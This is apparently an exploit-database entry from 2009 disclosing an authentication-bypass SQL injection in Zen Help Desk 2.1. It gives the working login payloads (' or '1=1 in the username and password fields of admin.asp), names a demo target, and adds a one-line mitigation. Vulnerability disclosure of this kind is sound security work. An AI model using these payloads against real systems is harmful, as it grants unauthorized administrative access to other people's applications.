Zen Help Desk Version 2.1 (Auth Bypass) SQL Injection Vulnerability

vendor:

Zen Help Desk

by:

TiGeR-Dz

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Zen Help Desk

Affected Version From: 2.1

Affected Version To: 2.1

Patch Exists: NO

Related CWE: N/A

CPE: a:zenhelpdesk:zen_help_desk

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Zen Help Desk Version 2.1 (Auth Bypass) SQL Injection Vulnerability

An attacker can bypass authentication by entering the username as '[admin_name]' or '1=1' and the password as 'No Thing' or '1=1' in the admin.asp page of the Zen Help Desk Version 2.1 application.

Mitigation:

Ensure that user input is validated and sanitized before being used in SQL queries.

Source

Exploit-DB raw data:

---------------------------------------------------------------
------------------------------------------------------------
Zen Help Desk Version 2.1 (Auth Bypass) SQL Injection Vulnerability 
---------------------------------------------------------------
Founder : TiGeR-Dz
Home:http://www.zenhelpdesk.com/
Script:Zen Help Desk Version 2.1 
---------------------------------------------------------------
---------------------------------------------------------------
Exploit:
-------
http://www.site.com/admin.asp

username:[admin_name]' or '1=1
password: No Thing

or 

username:' or '1=1
password:' or '1=1

--------------------------------------
Dem0
---
http://helpdesk-demo.com/admin.asp

--------------------------------------
Greeting To ALL My Friends (Dz)
----------------------------------------------------------------

# milw0rm.com [2009-05-29]